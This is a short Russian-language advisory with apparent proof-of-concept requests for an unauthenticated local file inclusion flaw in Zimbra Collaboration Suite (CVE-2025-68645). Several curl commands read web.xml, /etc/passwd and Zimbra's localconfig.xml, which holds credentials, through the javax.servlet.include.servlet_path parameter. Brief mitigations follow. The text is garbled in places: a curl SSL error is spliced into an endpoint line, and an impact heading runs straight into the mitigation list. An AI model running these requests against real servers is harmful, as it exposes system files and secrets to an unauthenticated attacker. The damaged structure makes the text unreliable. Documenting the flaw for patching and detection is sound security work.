
CVE-2025-68645
В этом документе описывается уязвимость Local File Inclusion (LFI), затрагивающая Zimbra Collaboration Suite.
Проблема возникает из-за неправильной обработки следующего параметра:
/h/*?javax.servlet.include.servlet_path=
Это позволяет неаутентифицированному пользователю получать доступ к внутренним ресурсам приложения.
Тестовый запрос:
curl -k "https://TARGET/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml"


Несколько конечных точек обрабатывают уязвимый параметр по-разному.
/h/printcalendar?javax.servlet.include.servlet_path=...
/h/restSSL: certificate subject name does not match target host
curl -k "https://TARGET/..."
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/WEB-INF/web.xml"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/etc/passwd"
curl -k "https://TARGET/h/printcalendar?javax.servlet.include.servlet_path=/opt/zimbra/conf/localconfig.xml"
Успешная эксплуатация может привести к:
Обновить Zimbra до исправленных версий
Ограничить доступ к уязвимым конечным точкам
Отслеживать логи на наличие подозрительных параметров:
javax.servlet.include.servlet_pathРазвернуть правила WAF для блокировки вредоносных шаблонов